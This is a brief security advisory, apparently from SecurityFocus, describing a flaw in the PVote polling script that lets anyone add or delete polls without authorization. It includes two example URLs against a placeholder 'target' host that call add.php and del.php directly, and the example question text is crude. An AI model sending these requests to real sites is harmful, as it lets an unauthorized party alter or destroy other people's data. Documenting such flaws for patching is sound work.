PVote Poll Content Manipulation Vulnerability

This issue may be exploited with a web browser. This condition may be reproduced with the following example:

ADD A POLL:

http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad

where question refers to the topic of the topic to be added by the attack.

DELETE A POLL:

http://target/pvote/del.php?pollorder=1

where pollorder is the poll 'id' number for the poll to be deleted.


 

Privacy Statement
Copyright 2010, SecurityFocus